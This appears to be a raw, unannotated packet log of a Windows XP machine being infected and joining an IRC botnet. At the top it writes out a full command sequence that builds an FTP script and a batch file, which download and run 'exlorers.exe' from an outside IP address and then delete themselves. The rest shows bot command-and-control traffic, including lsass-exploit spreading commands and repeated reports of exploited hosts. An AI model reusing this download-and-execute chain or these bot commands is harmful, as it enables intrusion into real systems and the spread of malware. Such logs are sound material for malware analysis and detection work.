Client: echo open 118.21.24.133 2871>.pif C:\\\\WINDOWS\\\\system32>


VICTIM:  	Microsoft Windows XP [Version 5.1.2600] 
VICTIM:  	(C) Copyright 1985-2001 Microsoft Corp.C:\\WINDOWS\\system32> 
VICTIM:  	echo open 118.21.24.133 2871>.pif C:\\WINDOWS\\system32> 
VICTIM:  	echo user a a>>.pif C:\\WINDOWS\\system32> 
VICTIM:  	echo binary>>.pif C:\\WINDOWS\\system32> 
VICTIM:  	echo GET exlorers.exe>>.pif C:\\WINDOWS\\system32> 
VICTIM:  	echo bye>>.pif C:\\WINDOWS\\system32> 
VICTIM:  	echo @echo off >c.batC:\\WINDOWS\\system32> 
VICTIM:  	echo ftp -n -v -s:.pif >>c.batC:\\WINDOWS\\system32> 
VICTIM:  	echo exlorers.exe >>c.batC:\\WINDOWS\\system32> 
VICTIM:  	echo del .pif >>c.batC:\\WINDOWS\\system32> 
VICTIM:  	echo del /F c.bat >>c.batC:\\WINDOWS\\system32> 
VICTIM:  	echo exit /y >>c.batC:\\WINDOWS\\system32> 
ATTACKER:	220  
VICTIM:  	USER a 
ATTACKER:	331  
VICTIM:  	PASS a 
ATTACKER:	230  
VICTIM:  	TYPE I 
ATTACKER:	200  
VICTIM:  	PORT 192,168,1,220,4 
ATTACKER:	200  
ATTACKER:	RETR exlorers.exe 
ATTACKER:	150  
ATTACKER:	226  
VICTIM:  	QUIT 
ATTACKER:	221  
VICTIM:  	NICK `jllzeglxUSER `jllzeglx 0 0 :`jllzeglx 
ATTACKER:	:aaa.38329.com 001 `jllzeglx :time, `jllzeglx!~jllzeglx@192.168.1.220:aaa.38329.com 005 `jllzeglx MAP KNOCK SAFELIST HCN MAXCHANNELS=500 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server:aaa.38329.com 005 `jllzeglx WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=time CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server:aaa.38329.com 422 `jllzeglx :MOTD File is missing:`jllzeglx MODE `jllzeglx :+i 
VICTIM:  	JOIN #.has hs 
ATTACKER:	:`jllzeglx!~jllzeglx@192.168.1.220 JOIN :#.has:aaa.38329.com 332 `jllzeglx #.has :.join #.k `sniff.on -s |`adv.start lsass 100 3 0 x.x.x.x -r -s:aaa.38329.com 333 `jllzeglx #.has yess 1217755462:aaa.38329.com 353 `jllzeglx @ #.has :`jllzeglx @yess :aaa.38329.com 366 `jllzeglx #.has :End of /NAMES list. 
VICTIM:  	USERHOST `jllzeglxJOIN #.has hsUSERHOST `jllzeglxJOIN #.has hsUSERHOST `jllzeglx 
ATTACKER:	:aaa.38329.com 302 `jllzeglx :`jllzeglx=+~jllzeglx@192.168.1.220    :aaa.38329.com 302 `jllzeglx :`jllzeglx=+~jllzeglx@192.168.1.220    :aaa.38329.com 302 `jllzeglx :`jllzeglx=+~jllzeglx@192.168.1.220     
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.195.33.82) 
VICTIM:  	PRIVMSG #.lagja :ftp: 192.168.1.220 on 105 
ATTACKER:	:aaa.38329.com 404 `jllzeglx #.lagja :No external channel messages (#.lagja):aaa.38329.com 404 `jllzeglx #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.241.232.65) 
VICTIM:  	PRIVMSG #.lagja :ftp: 192.168.1.220 on 105 
ATTACKER:	:aaa.38329.com 404 `jllzeglx #.lagja :No external channel messages (#.lagja):aaa.38329.com 404 `jllzeglx #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.129.203.234) 
ATTACKER:	:aaa.38329.com 404 `jllzeglx #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :ftp: 192.168.1.220 on 105 
ATTACKER:	:aaa.38329.com 404 `jllzeglx #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.158.165.122) 
VICTIM:  	PRIVMSG #.lagja :ftp: 192.168.1.220 on 105 
ATTACKER:	:aaa.38329.com 404 `jllzeglx #.lagja :No external channel messages (#.lagja) 
ATTACKER:	:aaa.38329.com 404 `jllzeglx #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.209.169.213) 
VICTIM:  	PRIVMSG #.lagja :ftp: 192.168.1.220 on 105 
ATTACKER:	:aaa.38329.com 404 `jllzeglx #.lagja :No external channel messages (#.lagja) 
ATTACKER:	:aaa.38329.com 404 `jllzeglx #.lagja :No external channel messages (#.lagja) 
ATTACKER:	:yess!JiMi@netadmin.kosovachat.ww4.us PRIVMSG #.has :`set jimi jimi -s 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.55.69.156) 
VICTIM:  	PRIVMSG #.lagja :ftp: 192.168.1.220 on 105 
ATTACKER:	:aaa.38329.com 404 `jllzeglx #.lagja :No external channel messages (#.lagja) 
ATTACKER:	:yess!JiMi@netadmin.kosovachat.ww4.us PRIVMSG #.has :`b.luptime 1 -n:aaa.38329.com 404 `jllzeglx #.lagja :No external channel messages (#.lagja):aaa.38329.com 404 `jllzeglx #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.124.106.33) 
ATTACKER:	:aaa.38329.com 404 `jllzeglx #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :ftp: 192.168.1.220 on 105 
ATTACKER:	:aaa.38329.com 404 `jllzeglx #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.50.233.204) 
VICTIM:  	PRIVMSG #.lagja :ftp: 192.168.1.220 on 105 
ATTACKER:	:aaa.38329.com 404 `jllzeglx #.lagja :No external channel messages (#.lagja) 
ATTACKER:	:aaa.38329.com 404 `jllzeglx #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.248.23.199) 
ATTACKER:	:aaa.38329.com 404 `jllzeglx #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :ftp: 192.168.1.220 on 105 
ATTACKER:	:aaa.38329.com 404 `jllzeglx #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.93.72.94) 
VICTIM:  	PRIVMSG #.lagja :ftp: 192.168.1.220 on 105 
ATTACKER:	:aaa.38329.com 404 `jllzeglx #.lagja :No external channel messages (#.lagja) 
ATTACKER:	:aaa.38329.com 404 `jllzeglx #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.208.56.41) 
ATTACKER:	:aaa.38329.com 404 `jllzeglx #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :ftp: 192.168.1.220 on 105 
ATTACKER:	:aaa.38329.com 404 `jllzeglx #.lagja :No external channel messages (#.lagja)